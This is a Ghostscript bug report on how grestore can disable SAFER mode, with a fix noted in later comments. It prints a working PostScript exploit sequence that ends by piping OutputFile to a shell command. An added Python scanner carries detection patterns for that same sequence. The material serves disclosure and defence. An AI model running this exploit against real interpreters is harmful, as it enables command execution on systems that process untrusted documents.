Bug 699687 - grestore can bypass SAFER
Summary: grestore can bypass SAFER
Status: RESOLVED FIXED
Alias: None
Product: Ghostscript
Classification: Unclassified
Component: General
Version: unspecified
Hardware: PC Windows 7
Importance: P4 normal
Assignee: Chris Liddell (chrisl)
QA Contact: gs-security
Duplicates: 699697
Reported: 2018-08-29 07:01 UTC by Ken Sharp
Modified: 2018-12-18 11:37 UTC
Description Ken Sharp 2018-08-29 07:01:10 UTC
This has been moved from the never-ending bug #699654; the last comment in that thread demonstrates a similar issue to the original report, but using grestore instead of restore:

-------------------------------------------------------------------------------
GS>currentpagedevice wcheck ==
false
GS>currentpagedevice /HWResolution get wcheck ==
true

You can't def HWResolution (for example), but you can just put or astore into it. If you put some junk in there, then grestore doesn't work:

GS>a0
GS>currentpagedevice /HWResolution get 0 (foobar) put
GS>grestore
Error: /rangecheck in .installpagedevice

Then LockSafetyParams is false again:

GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get == pop
false


That doesn't work with save (only gsave), so the full exploit:

a0
currentpagedevice /HWResolution get 0 (foobar) put
{ grestore } stopped {} if
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
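Added here as an example that is not part of the bug report or of Ghostscript's own code: a small Python triage scanner that flags the indicators in the sequence above (a write into an array held by the page-device dictionary, a deliberately swallowed grestore, and OutputFile pointed at %pipe% via putdeviceprops) so PostScript inputs can be checked before they reach an interpreter. The rule names and the benign sample are constructed; the suspicious sample is the sequence from the report.

```python
import re

# Sample taken from the report above, used here as scanner input.
SUSPICIOUS_PS = """a0
currentpagedevice /HWResolution get 0 (foobar) put
{ grestore } stopped {} if
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
"""

# Constructed benign file for contrast: ordinary text output, no device changes.
BENIGN_PS = """%!PS
/Helvetica findfont 12 scalefont setfont
72 700 moveto (Hello) show
showpage
"""

# Each rule: (name, compiled regex, one-line rationale tied to the report).
RULES = [
    ("pipe-outputfile",
     re.compile(r"/OutputFile\s*\(\s*%pipe%", re.I),
     "OutputFile redirected to %pipe%: command execution once SAFER is off"),
    ("putdeviceprops-outputfile",
     re.compile(r"/OutputFile\b.*\bputdeviceprops\b", re.S),
     "OutputFile changed through putdeviceprops rather than setpagedevice"),
    ("pagedevice-array-write",
     re.compile(r"currentpagedevice\s*/\w+\s+get\s+\d+\s+\S+\s+put\b"),
     "put into an array fetched from the read-only page device dictionary"),
    ("swallowed-grestore",
     re.compile(r"\{\s*grestore\s*\}\s*stopped"),
     "grestore error caught with stopped: hides the .installpagedevice failure"),
]

def scan_postscript(text):
    """Return the sorted names of all rules that match the PostScript source."""
    return sorted(name for name, rx, _ in RULES if rx.search(text))

def explain(text):
    """Return (rule, rationale) pairs for every match, for an analyst's report."""
    return [(name, why) for name, rx, why in RULES if rx.search(text)]

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_PS), ("benign", BENIGN_PS)):
        print(label, scan_postscript(src))
```

A hit on any single rule is only a signal; the combination of all four is the pattern this report describes.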
Comment 1 Ken Sharp 2018-09-01 10:16:55 UTC
*** Bug 699697 has been marked as a duplicate of this bug. ***
Comment 2 Ken Sharp 2018-09-01 10:33:04 UTC
I have a fix for this which I've asked Chris to review, especially to review any non-standard devices which might be vulnerable in the same way. I imagine we'll have a fix committed shortly.
Comment 3 Ken Sharp 2018-09-03 07:42:33 UTC
Commit 7ba6d80c69f0c74601ffc1077d27e0d1a299e57f addresses this issue.